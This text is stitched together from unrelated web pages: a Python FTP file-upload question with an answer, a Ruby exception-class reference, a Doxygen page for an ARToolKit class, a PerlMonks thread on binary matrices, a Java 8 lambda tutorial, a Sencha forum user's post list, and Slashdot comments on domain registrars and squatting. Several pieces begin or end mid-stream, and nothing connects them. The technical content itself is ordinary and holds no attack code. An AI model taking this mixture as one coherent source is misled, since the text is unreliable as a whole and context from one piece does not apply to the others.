ftp.login('****', '*****')
ftp.cwd('uploads')
myfile = open('/Users/Joey/Downloads/test.doc', 'rb')
ftp.storbinary('STOR ' + filename, myfile)
myfile.close()
I have been using the Python shell to execute this script, will I need to make changes if I wanted this script to be executed when the user submits the form?
I am using wamp as a local server to host my simple html form on a webpage. I am assuming you need a variable to record the file chosen from the form, instead of my script just having the test file already written?
Thanks for any help in advance
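The exact answer depends on how the form reaches the script (CGI, a micro-framework, etc.), but one workable shape is to factor the FTP logic into a function that takes whatever file object and name the form handler hands you. This is only a sketch under assumptions: `upload_file` and `FakeFTP` are names I made up, and `FakeFTP` is a stand-in recorder so the snippet runs without a live server; swap in a logged-in `ftplib.FTP` instance for real use.

```python
import io
import posixpath

def upload_file(ftp, filename, fileobj, remote_dir='uploads'):
    """Send fileobj to remote_dir on an already-logged-in FTP connection."""
    safe_name = posixpath.basename(filename)  # never trust a client-supplied path
    ftp.cwd(remote_dir)
    ftp.storbinary('STOR ' + safe_name, fileobj)
    return safe_name

class FakeFTP:
    """Stand-in that records the calls a real ftplib.FTP object would get."""
    def __init__(self):
        self.commands = []
    def cwd(self, dirname):
        self.commands.append(('cwd', dirname))
    def storbinary(self, cmd, fp):
        self.commands.append(('storbinary', cmd, fp.read()))

ftp = FakeFTP()
name = upload_file(ftp, '/Users/Joey/Downloads/test.doc', io.BytesIO(b'contents'))
print(name)             # test.doc
print(ftp.commands[0])  # ('cwd', 'uploads')
```

In a web handler you would pass the uploaded file's name and its file-like object straight into `upload_file` instead of opening a path on disk.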
Upcoming Documentation for Exception Classes¶
NoMemoryError
Raised when memory allocation fails.
ScriptError
ScriptError is the superclass for errors raised when a script can not be executed because of a +LoadError+, +NotImplementedError+ or a +SyntaxError+. Note that these types of errors are not +StandardError+ subclasses and will not be rescued unless specified explicitly (or their ancestor +Exception+).
LoadError
Raised when a file required (a Ruby script, extension library, ...) fails to load.
require 'this/file/does/not/exist' # => LoadError: no such file to load -- this/file/does/not/exist
NotImplementedError
Raised when a feature is not implemented on the current platform. For example, methods depending on the +fsync+ or +fork+ system calls may raise this exception if the underlying operating system or Ruby runtime does not support them.
SyntaxError
Raised when encountering Ruby code with an invalid syntax.
eval("1+1=2") # => SyntaxError: (eval):1: syntax error, unexpected '=', expecting $end
SecurityError
Raised when attempting a potential unsafe operation (typically when the $SAFE level is raised above 0)
foo = "bar"
proc = Proc.new do
$SAFE = 4
foo.gsub! "a", "*"
end
proc.call # => SecurityError: Insecure: can't modify string
SignalException
Raised when a signal is received, for example by Process.kill
begin
Process.kill('HUP',Process.pid)
rescue SignalException => e
puts "received Exception #{e}"
end
# => received Exception SIGHUP
Interrupt
Raised with the interrupt signal is received, typically because the user pressed on Control-C (on most posix platforms). As such, it is a subclass of +SignalException+.
begin
puts "Press ctrl-C when you are bored"
loop {}
rescue Interrupt => e
puts "Note: You will typically use Signal.trap instead."
end
StandardError
The most standard error types are subclasses of StandardError. A rescue clause without an explicit Exception class will rescue all StandardErrors (and only those).
do_something_that_raises_a_standard_error rescue "Hello"
# => "Hello"

require 'does/not/exist' rescue "Hi"
# => LoadError: no such file to load -- does/not/exist
ArgumentError
Raised when the arguments are wrong and there isn't a more specific Exception class. For example, passing the wrong number of arguments or a value that is not acceptable will typically raise an ArgumentError.
[1, 2, 3].first(4, 5) # => ArgumentError: wrong number of arguments (2 for 1)
[1, 2, 3].first(-4) # => ArgumentError: negative array size
FiberError
Raised when an invalid operation is attempted on a Fiber, in particular when attempting to call/resume a dead fiber, attempting to yield from the root fiber, or calling a fiber across threads.
fiber = Fiber.new{}
fiber.resume # => nil
fiber.resume # => FiberError: dead fiber called
IndexError
Raised when the given index is invalid.
a = [:foo, :bar]
a.fetch(0) # => :foo
a[2] # => nil
a.fetch(2) # => IndexError: index 2 out of array
KeyError
Raised when the specified key is not found. It is a subclass of IndexError.
h = {:foo => :bar}
h.fetch(:foo) # => :bar
h.fetch(:baz) # => KeyError: key not found
StopIteration
Raised to stop the iteration, in particular by Enumerator#next. It is rescued by Kernel#loop.
loop do
puts "Hello"
raise StopIteration
puts "World"
end
puts "Done!"
# => Outputs "Hello" and "Done!"
IOError
Raised when an IO operation fails.
EOFError
Raised by some IO operations when reaching the end of file. Many IO methods exist in two forms: one that returns nil when the end of file is reached, the other that raises EOFError.
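The two entries above arrived without examples; here is a minimal sketch (mine, not from the original reference) showing EOFError with an in-memory StringIO:

```ruby
require 'stringio'

io = StringIO.new("line1\n")
first = io.readline        # => "line1\n"
begin
  io.readline              # no data left, so readline raises EOFError
rescue EOFError
  status = "reached end of file"
end
```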
LocalJumpError
Raised when Ruby can't yield as requested.
def call_block
yield 42
end
call_block # => LocalJumpError: no block given (yield)
def get_me_a_return
Proc.new { return 42 }
end
get_me_a_return.call # => LocalJumpError: unexpected return
NameError
Raised when a given name is invalid or undefined.
puts foo # => NameError: undefined local variable or method `foo' for main:Object
Fixnum.const_set :answer, 42 # => NameError: wrong constant name answer
NoMethodError
Raised when a method is called on a receiver which doesn't have it defined and also fails to respond with +method_missing+.
"hello".to_ary # => NoMethodError: undefined method `to_ary' for "hello":String
RangeError
Raised when a given numerical value is out of range.
[1, 2, 3].drop(1 << 100) # RangeError: bignum too big to convert into `long'
FloatDomainError
Raised when attempting to convert special float values (infinite or NaN) to numerical classes which don't support them.
Float::INFINITY.to_r # => FloatDomainError: Infinity
RegexpError
Raised when given an invalid regexp expression.
Regexp.new("?") # => RegexpError: target of repeat operator is not specified: /?/
RuntimeError
Raised when an invalid operation is attempted.
Kernel.raise will raise a RuntimeError if no Exception class is specified.
raise "ouch" # => RuntimeError: ouch
[1, 2, 3].freeze << 4 # => RuntimeError: can't modify frozen array
SystemCallError
SystemCallError is the base class for all low-level platform-dependent errors. The errors available on the current platform are subclasses of SystemCallError and are defined in the Errno module.
File.open("does/not/exist") # => Errno::ENOENT: No such file or directory - does/not/exist
ThreadError
Raised when an invalid operation is attempted on a thread.
Thread.stop # => ThreadError: stopping only thread
TypeError
Raised when encountering an object that is not of the expected type.
[1, 2, 3].first("two") # => TypeError: can't convert String into Integer
ZeroDivisionError
Raised when attempting to divide an integer by 0.
42 / 0 # => ZeroDivisionError: divided by 0
42 / 0.0 # => Float::INFINITY
SystemExit
Raised by exit to initiate the termination of the script.
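A small sketch (my own addition): SystemExit is an Exception but not a StandardError, so a bare rescue will not catch it; naming it lets cleanup code run before termination.

```ruby
begin
  exit 42
rescue SystemExit => e
  status = e.status    # the exit status the script would have used
end
puts "still running; would have exited with #{status}"
```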
SystemStackError
Raised in case of a stack overflow.
def me_myself_and_i
me_myself_and_i
end
me_myself_and_i # => SystemStackError: stack level too deep
Encoding::CompatibilityError
Raised by Encoding and String methods when the source encoding is incompatible with the target encoding.
Encoding::ConverterNotFoundError
Raised by transcoding methods when a named encoding does not correspond with a known converter.
Encoding::UndefinedConversionError
Raised by Encoding and String methods when a transcoding operation fails.
Encoding::InvalidByteSequenceError
Raised by Encoding and String methods when the string being transcoded contains a byte invalid for either the source or target encoding.
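A short sketch (my own, not from the original reference) triggering the two most common of these transcoding errors:

```ruby
# "é" has no US-ASCII representation, so encoding raises
# Encoding::UndefinedConversionError
begin
  "\u00e9".encode("US-ASCII")
rescue Encoding::UndefinedConversionError => e
  undefined = e.error_char      # the character that could not be converted
end

# a lone 0xFF byte is not valid UTF-8, so transcoding raises
# Encoding::InvalidByteSequenceError
begin
  "abc\xFF".force_encoding("UTF-8").encode("UTF-16")
rescue Encoding::InvalidByteSequenceError => e
  invalid = e.error_bytes       # the offending bytes
end
```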
ot::ARToolKitSource Class Reference

An ARToolKitSource represents a single marker that is tracked by the artoolkit library.
More...
[Device Input Classes]
#include <ARToolKitSource.h>
Inheritance diagram for ot::ARToolKitSource:
Detailed DescriptionAn ARToolKitSource represents a single marker that is tracked by the artoolkit library.
Definition at line 74 of file ARToolKitSource.h.
Constructor & Destructor Documentation
constructor method
Definition at line 96 of file ARToolKitSource.h.
Member Function Documentation
tests for EventGenerator interface being present.
Is overridden to return 1 always.
- Returns:
- always 1
Reimplemented from ot::Node.
Definition at line 110 of file ARToolKitSource.h.
Friends And Related Function Documentation
Definition at line 113 of file ARToolKitSource.h.
Definition at line 116 of file ARToolKitSource.h.
Member Data Documentation
buffer variable for grabbing thread
Definition at line 79 of file ARToolKitSource.h.
center of the marker
Definition at line 85 of file ARToolKitSource.h.
the event pushed into the tree
Definition at line 79 of file ARToolKitSource.h.
marker id from the artoolkit library
Definition at line 83 of file ARToolKitSource.h.
is a new update ready in the buffer?
Definition at line 89 of file ARToolKitSource.h.
size of the marker
Definition at line 87 of file ARToolKitSource.h.
The documentation for this class was generated from the following file:
in reply to Re: decomposing binary matrices
in thread decomposing binary matrices
Thanks, I tried drawing the graph on a piece of paper, and while I'm not yet sure I think it may be possible to say that: the graph for any undecomposable submatrix has a cycle that traverses all its nodes; and that: the nodes in the longest cycle form the largest undecomposable submatrix. Thus from the example in the OP, you can get cycles A-2-E-4-A and B-3-C-1-D-5-B, but there is no cycle looping through all 10 of the nodes.
That does not immediately help, since Graph will only find "the first cycle" - I can't tell from the docs (nor from a brief look at the code), but I suspect that since all my edges are undirected, it will just immediately return (eg) A-2-A as a cycle - but this concept may well help me search for an algorithm.
Update: this page tells me:
Finding the longest cycle in a graph includes the special case of Hamiltonian cycle (see gif), so it is NP-complete.
Hugo
That was the reason I suggested the Mastering Algorithms with Perl book. It dealt quite a few algorithms and devotes a chapter to matrices. It also goes into great detail for several different methods for using Graph.
Graph by itself is not very useful because it is expected that you know what your are doing, which I find frustrating when I encounter a problem. But there is a lot more to it than first appearances would suggest.
Lots
Some
Very few
None
Results (222 votes),
past polls | http://www.perlmonks.org/index.pl?node_id=600448 | CC-MAIN-2016-07 | en | refinedweb |
In the previous article “Java SE 8 new features tour: The Big change, in Java Development world”, where I have talked about what we are going to explore during this series. I have started by an introduction to Java SE 8 main features, followed by installation process of JDK8 on both Microsoft windows and Apple Mac OS X platforms, with important advices and notice to take care of.
Finally, we went through a development of a console application powered by Lambda expression to make sure that we have installed Java SE 8 probably.
Source code is hosted on my Github account: Clone from HERE.
What is Lambda expression?
Perhaps the best-known new feature of Java SE 8 is called Project Lambda, an effort to bring Java into the world of functional programming.
In computer science terminology;
A Lambda is an anonymous function. That is, a function without a name.
In Java;
All functions are members of classes, and are referred to as methods. To create a method, you need to define the class of which it’s a member.
A lambda expression in Java SE 8 lets you define a class and a single method with very concise syntax implementing an interface that has a single abstract method.
Let’s figure out the idea.
Lambda Expressions lets developers simplify and shorten their code. Making it more readable and maintainable. This leads to remove more verbose class declarations.
Let’s take a look at a few code snippets.
- Implementing an interface: Prior to Java SE 8, if you wanted to create a thread, you’d first define a class that implements the runnable interface. This is an interface that has a single abstract method named Run that accepts no arguments. You might define the class in its own code file. A file named by MyRunnable.java. And you might name the class, MyRunnable, as I’ve done here. And then you’d implement the single abstract method.
public class MyRunnable implements Runnable { @Override public void run() { System.out.println("I am running"); } public static void main(String[] args) { MyRunnable r1 = new MyRunnable(); new Thread(r1).start(); } }
In this example, my implementation outputs a literal string to the console. You would then take that object, and pass it to an instance of the thread class. I’m instantiating my runnable as an object named r1. Passing it to the thread’s constructor and calling the thread’s start method. My code will now run in its own thread and its own memory space.
- Implementing an inner class: You could improve on this code a bit, instead of declaring your class in a separate file, you might declare it as single use class, known as an inner class, local to the method in which it’s used.
public static void main(String[] args) {
    Runnable r1 = new Runnable() {
        @Override
        public void run() {
            System.out.println("I am running");
        }
    };
    new Thread(r1).start();
}
So now, I’m once again creating an object named r1, but I’m calling the interface’s constructor method directly. And once again, implementing it’s single abstract method. Then I’m passing the object to the thread’s constructor.
- Implementing an anonymous class: And you can make it even more concise, by declaring the class as an anonymous class, so named because it’s never given a name. I’m instantiating the runnable interface and immediately passing it to the thread constructor. I’m still implementing the run method and I’m still calling the thread’s start method.
public static void main(String[] args) {
    new Thread(new Runnable() {
        @Override
        public void run() {
            System.out.println("I am running");
        }
    }).start();
}
- Using lambda expression: In Java SE 8 you can re-factor this code to significantly reduce it and make it a lot more readable. The lambda version might look like this.
public static void main(String[] args) {
    Runnable r1 = () -> System.out.println("I am running");
    new Thread(r1).start();
}
I’m declaring an object with a type of runnable but now I’m using a single line of code to declare the single abstract method implementation and then once again I’m passing the object to the Thread’s constructor. You are still implementing the runnable interface and calling it’s run method but you’re doing it with a lot less code. In addition, it could be improved as the following:
public static void main(String[] args) {
    new Thread(() -> System.out.println("I am running")).start();
}
Here is an important quote from an early specs document about Project Lambda.
Lambda expressions can only appear in places where they will be assigned to a variable whose type is a functional interface.
Quote By Brian Goetz
Let’s break this down to understand what’s happening.
What are the functional interfaces?
A functional interface is an interface that has only a single custom abstract method. That is, one that is not inherited from the object class. Java has many of these interfaces such as Runnable, Comparable, Callable, TimerTask and many others.
Prior to Java 8, they were known as Single Abstract Method or SAM interfaces. In Java 8 we now call them functional interfaces.
Lambda Expression syntax:
This lambda expression is returning an implementation of the runnable interface; it has two parts separated by a new bit of syntax called the arrow token or the Lambda operator. The first part of the lambda expression, before the arrow token, is the signature of the method you’re implementing.
In this example, it’s a no arguments method so it’s represented just by parentheses. But if I’m implementing a method that accepts arguments, I would simply give the arguments names. I don’t have to declare their types.
Because the interface has only a single abstract method, the data types are already known. And one of the goals of a lambda expression is to eliminate unnecessary syntax. The second part of the expression, after the arrow token, is the implementation of the single method’s body.
If it’s just a single line of code, as with this example, you don’t need anything else. To implement a method body with multiple statements, wrap them in braces.
Runnable r = () -> {
    System.out.println("Hello!");
    System.out.println("Lambda!");
};
Lambda Goals:
Lambda Expressions can reduce the amount of code you need to write and the number of custom classes you have to create and maintain.
If you’re implementing an interface for one-time use, it doesn’t always make sense to create yet another code file or yet another named class. A Lambda Expression can define an anonymous implementation for one time use and significantly streamline your code.
Defining and instantiating a functional interface
To get started learning about lambda expressions, I'll create a brand-new functional interface, that is, an interface with a single abstract method, and then I'll implement that interface with a lambda expression.
You can use my source code project "JavaSE8-Features" hosted on GitHub to navigate the project code.
Method without any argument, Lambda implementation
In my source code, I'll put the interface into its own sub-package ending with lambda.interfaces, and I'll name the interface HelloInterface. In order to implement an interface with a lambda expression, it must have a single abstract method. I will declare a public method that returns void, and I'll name it doGreeting; it won't accept any arguments. That is all you need to do to make an interface that's usable with lambda expressions. If you want, you can use a new annotation added in Java SE 8, named @FunctionalInterface.
/**
 * @author mohamed_taman
 */
@FunctionalInterface
public interface HelloInterface {
    void doGreeting();
}
Now I am ready to create a new class, UseHelloInterface, under the lambda.impl package, which will instantiate my functional interface (HelloInterface) as follows:
/**
 * @author mohamed_taman
 */
public class UseHelloInterface {
    // out is available via: import static java.lang.System.out;
    public static void main(String[] args) {
        HelloInterface hello = () -> out.println("Hello from Lambda expression");
        hello.doGreeting();
    }
}
Run the file and check the result; it should output the following.
------------------------------------------------------------------------------------
--- exec-maven-plugin:1.2.1:exec (default-cli) @ Java8Features ---
Hello from Lambda expression
------------------------------------------------------------------------------------
So that’s what the code can look like when you’re working with a single abstract method that doesn’t accept any arguments. Let’s take a look at what it looks like with arguments.
Method with arguments, Lambda implementation
Under lambda.interfaces, I'll create a new interface and name it CalculatorInterface. Then I will declare a public method that returns void, and I will name it doCalculate; it will receive two integer arguments, value1 and value2.
/**
 * @author mohamed_taman
 */
@FunctionalInterface
public interface CalculatorInterface {
    public void doCalculate(int value1, int value2);
}
Now I am ready to create a new class, UseCalculatorInterface, under the lambda.impl package, which will instantiate my functional interface (CalculatorInterface) as follows:
public static void main(String[] args) {
    CalculatorInterface calc = (v1, v2) -> {
        int result = v1 * v2;
        out.println("The calculation result is: " + result);
    };
    calc.doCalculate(10, 5);
}
Note the doCalculate() arguments: they were named value1 and value2 in the interface, but you can name them anything here. I'll name them v1 and v2. I don't need to put int before the argument names; that information is already known, because the compiler can infer it from the functional interface's method signature. Run the file and check the result; it should output the following.
------------------------------------------------------------------------------------
--- exec-maven-plugin:1.2.1:exec (default-cli) @ Java8Features ---
The calculation result is: 50
------------------------------------------------------------------------------------
BUILD SUCCESS
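As a side note (my own variation, not from the course files), you may still spell out the parameter types if you prefer; the compiler accepts both forms:

```java
public class ExplicitTypesDemo {

    @FunctionalInterface
    interface CalculatorInterface {
        void doCalculate(int value1, int value2);
    }

    public static void main(String[] args) {
        // Inferred parameter types, as in the example above
        CalculatorInterface calc1 = (v1, v2) -> System.out.println("Inferred: " + (v1 * v2));
        // Explicit parameter types: equivalent, just more verbose
        CalculatorInterface calc2 = (int v1, int v2) -> System.out.println("Explicit: " + (v1 * v2));
        calc1.doCalculate(10, 5); // Inferred: 50
        calc2.doCalculate(10, 5); // Explicit: 50
    }
}
```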
Always bear in mind the following rule:
Again, you have to follow that rule that the interface can only have one abstract method. Then that interface and its single abstract method can be implemented with a lambda expression.
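One nuance worth noting, shown here with a hypothetical interface of my own: default (and static) methods do not count toward that limit, so an interface can carry them and still be implemented with a lambda:

```java
@FunctionalInterface
interface Greeter {
    String greet(String name);                 // the single abstract method

    default String greetLoudly(String name) {  // default methods don't count
        return greet(name).toUpperCase();
    }
}

public class GreeterDemo {
    public static void main(String[] args) {
        Greeter g = name -> "Hello, " + name;
        System.out.println(g.greet("Lambda"));       // Hello, Lambda
        System.out.println(g.greetLoudly("Lambda")); // HELLO, LAMBDA
    }
}
```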
Using built-in functional interfaces with lambdas
I've previously described how to use a lambda expression to implement an interface you've created yourself. Now I'll show lambda expressions with built-in interfaces, that is, interfaces that are part of the Java runtime. I'll use two examples. I'm working in a package called lambda.builtin, which is part of the exercise files, and I'll start with the class UseThreading. In this class, I'm implementing the Runnable interface, which is part of the multithreaded architecture of Java. My focus here is on how you code it, not on how it operates. I'm going to show how to use lambda expressions to replace these inner classes. I'll comment out the code that's declaring the two objects, then re-declare them and do the implementation with lambdas. So let's start.
public static void main(String[] args) {
    // Old version
    // Runnable thrd1 = new Runnable() {
    //     @Override
    //     public void run() {
    //         out.println("Hello Thread 1.");
    //     }
    // };

    /* *****************************************
     * Using lambda expression inner classes   *
     ***************************************** */
    Runnable thrd1 = () -> out.println("Hello Thread 1.");
    new Thread(thrd1).start();

    // Old version
    /*
    new Thread(new Runnable() {
        @Override
        public void run() {
            out.println("Hello Thread 2.");
        }
    }).start();
    */

    /* ******************************************
     * Using lambda expression anonymous class  *
     ****************************************** */
    new Thread(() -> out.println("Hello Thread 2.")).start();
}
Let's look at another example. I will use a Comparator. Comparator is another functional interface in Java, whose single abstract method is compare. Open the UseComparator class and check the commented-out bit of code, which is the actual code before refactoring it into a lambda expression.
public static void main(String[] args) {
    // sort(...) and print(...) are statically imported helpers (Collections.sort and a local print method)
    List<String> values = new ArrayList<>();
    values.add("AAA");
    values.add("bbb");
    values.add("CCC");
    values.add("ddd");
    values.add("EEE");

    // Case-sensitive sort operation
    sort(values);
    out.println("Simple sort:");
    print(values);

    // Case-insensitive sort operation with anonymous class
    /*
    Collections.sort(values, new Comparator<String>() {
        @Override
        public int compare(String o1, String o2) {
            return o1.compareToIgnoreCase(o2);
        }
    });
    */

    // Case-insensitive sort operation with lambda
    sort(values, (o1, o2) -> o1.compareToIgnoreCase(o2));
    out.println("Sort with Comparator");
    print(values);
}
As before, this doesn't provide you any performance benefit; the underlying functionality is exactly the same. Whether you declare your own classes, use anonymous inner classes, or use lambda expressions is completely up to you.
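As a teaser for what comes next (my own variation on the sort above), the comparator lambda can be shortened further with a method reference:

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class MethodRefSort {
    public static void main(String[] args) {
        List<String> values = new ArrayList<>();
        Collections.addAll(values, "ddd", "AAA", "EEE", "bbb", "CCC");
        // String::compareToIgnoreCase matches Comparator<String>'s single method
        Collections.sort(values, String::compareToIgnoreCase);
        System.out.println(values); // [AAA, bbb, CCC, ddd, EEE]
    }
}
```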
In the next article of this series, we will explore and code how to traverse collections using lambda expressions, filter collections with Predicate interfaces, traverse collections with method references, implement default methods in interfaces, and finally implement static methods in interfaces.
Search Type: Posts; User: veenvliet.morion
- 3 Jun 2012 11:01 PM
With ext-all.js and ext-all-debug.js everything is fine.
With ext.js and ext-debug.js things go wrong on setting the innerHTML.
- 1 Jun 2012 3:46 AM
Hi,
I've got a problem.
I use Ext.Loader extensively, and only load ext-debug.js.
In all browsers this works great, but on IE9 I got an error on setting innerHTML in (and some other places).
It...
- 19 Apr 2012 12:12 AM
Your web.config is like it should be?
You have Ext.Direct... namespace included in your controller class files?
- 18 Apr 2012 11:51 PM
Does this work?
GET
Ext.Direct for ASP.Net MVC uses the Router mechanism MVC uses. (kinda ;) ).
Just check the example with Firebug or Webkit Dev tools to see...
- 3 Apr 2012 11:37 PM
Yep, that seems to work!
I added totalCount = 0 to the sort function as well, 'cause I have the same problem with sorting.
// because prefetchData is stored by index
// this...
- 3 Apr 2012 6:11 AM
I've exactly the same issue.
Using Ext.Direct.
I think it is a bug. 'Cause the store will not prefetch, because it thinks it has all the data. Which is true. But we want new data. :)
Is this...
- 3 Oct 2011 3:53 AM
Also interested! Does depend a bit on when...
- 10 Jun 2011 6:19 AM
Sounds good.
Reachable by train? That would be really nice.
- 23 May 2011 5:18 AM
Hey guys,
Interesting! I'm only now seeing this thread, but I'm definitely interested in a follow-up.
I work daily with ExtJS 3.3 in combination with ASP.Net MVC. I can certainly show something as well!
Soon...
- 28 Feb 2011 5:30 AM
I'm not sure, but if you have all javascript run through the compiler, and there is no external (from html onclick or what ever) source that will be calling a javascript function, there should not be...
- 11 Feb 2011 6:13 AM
Livegrid is fixed in a 0.5 branch!!
- 19 Nov 2010 6:50 AM
Interesting method. But does your controller still give back all the requested data? That would be a security hole, I think?
- 18 Nov 2010 7:29 AM
You don't use membership at all? How do you do authentication and work with the [Authorize] attribute?
Because of the [Authorize] attribute I work with the membership provider, or do you have...
- 17 Aug 2010 5:15 AM
You mean in Sencha Touch?
I searched, but did not find it. But it would be great to have it!!!
Because then I can convert quite easily my ExtJS app to Sencha Touch.
- 7 Jun 2010 1:59 AM
Looks quite good.
I detected one bug.
In the example "Slider with multiple thumbs" just click on the slider (not thumb) right of the last thumb. The first thumb will change to the clicked position,...
- 14 Jan 2010 5:17 AM
Looking sharp!!!
One suggestion to make it work more like Google Chrome, as explained here:...
- 7 Jan 2010 7:44 AM
Hi,
Do you see a chance to implement a DirectStore for BufferedStore?
I created my own, but maybe it's a good thing to include it in the main branch.
Keep up the good work.
PS: I...
- 27 Nov 2009 12:07 AM
ouch, totally missed that one.
Thanks!
- 26 Nov 2009 12:26 AM
Hi,
Thanks for your reaction (by the way, this is my business/ premium account. In private I'm maxigroovy :) )
The Gzip is only a matter of adding the header to the response. IIS will take care...
- 25 Nov 2009 4:37 AM
Great work.
I haven't had the time to test the new 0.8 version, but I think it's a great step forward.
I have another request (or is it already implemented?).
Would it be possible to use gzip...
- 22 Nov 2009 11:40 PM
Thanks for fixing this.
A little tip: you can use IETester for testing with different IE versions from one application.
- 19 Nov 2009 1:51 AM
Looks great, and it's something missing from the base set of extensions.
What's your license? Free to use? Even in commercial projects? BSD or GPL license?
Can you make a zip package of the source please? You can...
- 18 Nov 2009 12:31 AM
Hey,
The dhtmlx example on
Loads around 17 items per request/ scroll action. That are a lot of...
- 12 Nov 2009 12:38 AM
Hi,
I cannot answer your question, but I am interested in your changes/updates. Sometimes the buttons (Update/Save & Cancel) are rendered on the row I'm editing. Is that one of the bugs you fixed?...
citibank.co (Score:5, Funny)
now with moar than $100 billion in frictionless laundered money. That's what we call .colocation!
GoDaddy stories on Slashdot.
What registrar would you recommend? (Score:4, Interesting)
Re: (Score:3, Interesting)
Re: (Score:3, Informative)
gandi.net
Re: (Score:3, Informative)
Re: (Score:2)
I've been registering with 1&1 for years now. I have a free hosting account (developer preview) from 5 years ago. In any case, they charge $10 a year for .com - used to be $6 a year.
NearlyFreeSpeech (Score:2)
NearlyFreeSpeech is the best registrar and webhost anywhere. Rock bottom prices, clean website, and absolutely no bullshit. Just sayin' as a satisfied customer for three years.
Re: (Score:2)
I had about 30 domains with GoDaddy, and was very unhappy with their user interface and customer service. I wanted to be able to make mass changes to the domains, such as name servers. I tried a few different ones and settled on gkg.net [gkg.net]. It's not the prettiest, but it's inexpensive and reliable, and the website UI is simple (no crazy Ajax, Flash interface, browser requirements, etc). For my highly important business domains, I went with DynDNS [dyndns.com], which is slightly more expensive, but has a clean and beautiful
Re: (Score:2)
I've been very happy with gandi.net. [gandi.net]
Namecheap (Score:5, Informative)
I've been using Namecheap for years, and they've been pretty awesome. They have a nice set of DNS management tools, they notify me of all important things, and as their name implies, they're inexpensive.
Another thing I like about Namecheap is that you can delegate control over your names to other people. I run a suite of hobby gaming web sites, and I've made contingency plans in case I get hit by a proverbial bus. (Or a real one.) I've given one of the other site admins permissions over the names so that if need be, he can manage them or even move them to another registrar. Obviously, I trust him implicitly, but the point is that if something happens to me, the names aren't just up for grabs once the registration expires. They may exist, but I don't know of another registrar that allows you to delegate permissions like this.
I can't speak about their technical support; I've never had to use it.
Just to prove I'm not a shill for the company (I'm only affiliated with them as being a customer), if there's one thing that's stupid about them, it's their name. I mean, "Namecheap"? Makes them sound so, I dunno, Wal-Martish, especially given what has been a good record so far with me.
Re: (Score:2)
I agree - I host over 100 domains through Namecheap, and have never had any problem with them. I left GoDaddy because of their PlaySkool, Javascript intense interface, long before I had enough domains to be worried about the privacy and security implications.
I also like money. A lot. In that line, here's an affiliate link to Namecheap [namecheap.com] that might make me some
:)
Re: (Score:2, Informative)
That's what I did, and now my company provides and sells domains to all of our website design customers as a part of our packages.
Why go to a secondary reseller, when you can become one yourself and take out a middle man.
Re: (Score:2)
I'll look into this - thanks
:)
I don't do much web development these days, but this is still worth checking into.
Re: (Score:2)
I can speak for NameCheap's technical support. They are quick and helpful. I only have certificates with them, but it's an ever-growing number
:)
I have a reseller account with some other company for domains, which is tens of cents cheaper per domain (special offers not included). The only difference between going through NameCheap and reseller accounts is that the latter normally requires a little deposit. If they need no deposit, they're usually slightly more expensive. For just a few domains I'd go with N
Re: (Score:2)
I can second the Namecheap recommendation. I moved my registration and hosting/email of my dozen domains from Godaddy to Namecheap last year and have been very satisfied.
Re: (Score:2)
Re: (Score:3, Funny)
What do you mean by "weird domains"? Are you referring to something like "ifuckfishinmydreams.com" where the name itself is weird or "nationalreview.com" where all the writers are weird, or "lookbook.nu" where the idea is weird or...?
(Note: "ifuckfishinmydreams.com" is not a real website. But it you're interested in owning that domain, drop me an email. We can talk.)
It's not mined out. (Score:5, Informative)
It's squatted, sniped, tasted, and front-run out.
When a speculator can register thousands of names and move them around for free by playing the system, is there any wonder that .com is "mined out"? When a registrar front-runs domain names (Network Solutions) and fills the space with reserved names for itself, is there any wonder that .com is "mined out"?
Get rid of domain tasting and other shenanigans and the problem will go away.
--
BMO
Re: (Score:3, Informative)
This.
Also 'investors'. A little while back I read an online article by someone congratulating themselves on investing in .com names. He was going through a dictionary, finding obscure words and testing to see if they were available, then buying them up. He had about 30 dictionary words and he was going to make money on the idea, also encouraging others to do the same.
It's one of those times when you wish you could reach through the screen and strangle the person on the other side.
Squatters, 'investors' and: (Score:2)
I know that WWW is just one of many services. And a definition of "use" (or better, of what kind of behaviour leads to losing the domain) that eliminates most of the speculators and cybersquatters but doesn't hurt other people shouldn't be too difficult to find.
And if it's only done on request by someone with serious interest in using the domain, there would be no need to "visit millions of websites".
Re: (Score:2)
I doubt it. Accepting email (and then ignoring it) costs the "speculators and cybersquatters" nothing - they just point them all at the same mail server, just as they do with the web servers.
Plus, why is putting up a page of advertisements not "using"?
Re: (Score:2)
I doubt it. Accepting email (and then ignoring it) costs the "speculators and cybersquatters" nothing - they just point them all at the same mail server, just as they do with the web servers.
Oh my. Just imagine this: guy wants to register $HISNAME-software.com that is taken by a domain grabber. Guy goes to some kind of ombudsman who gives the thing a closer look and easily sees that the running mailserver is just an alibi. Domain will be transferred, grabber maybe fined.
Sure, you could never really get all of them, if we make sure not to have "false positives", but why shouldn't we at least get rid of the big ones, where it is easy to prove?
Plus, why is putting up a page of advertisements not "using"?
Because of the missing content?!
Re: (Score:2)
Flamebait? Seriously? What a stupid mod.
Re: (Score:2)
The easy solution would be a "use it or lose it" rule where the ownership of a domain that is just parked will be revoked when someone else would like to register it.
It is non-trivial to define "parked" in regards to a domain name in a way that is fair. I have 2 .com domains registered. One I've used since the price of a .com name was writing a justification memo to the InterNIC. I registered the other one in the late 90's when I thought I might want to migrate off the old one (complicated story) but I've never done so. My old registrar considered both of those domains "parked" simply because I didn't use their DNS servers for either of them, but in fact the old domai
Re: (Score:2)
Oh, "registering a domain in order to treat it as a good to be sold", maybe with an added "especially when not making any real use in terms of running stuff like websites, mail, ssh, VPN, ..." seems like a good starter to me.
And in your case, I would suspect that - assuming your business is not selling domains - your (businesses') name or what you do and the domain name give clear evidence that you had no malicious intent.
Re: (Score:2)
So what? That scheme would be obvious enough. They would have to come up with more complexity in the generated pages, register the domains to many different real people and so on. Maybe we'll have to add fines for "professional" parkers in the recipe.
OK, I admit that it's not sooo easy. But it would be a huge improvement over the situation now without being technically unrealistic.
And there is one thing I forgot: any abuse of domain tasting must be severely punished.
Re: (Score:2)
I wouldn't be against the prices being raised back to former levels across all top level names. For those who have a legitimate use for the name, the cost is still not that high, but high enough to force squatters to rethink their approach.
People may not be paying (Score:5, Interesting)
The squatters may just think people will pay. Remember that for something like this to happen there doesn't have to be an actual worthwhile market, just the perception of one. You get all kinds of dumb, greedy people who get into shit.
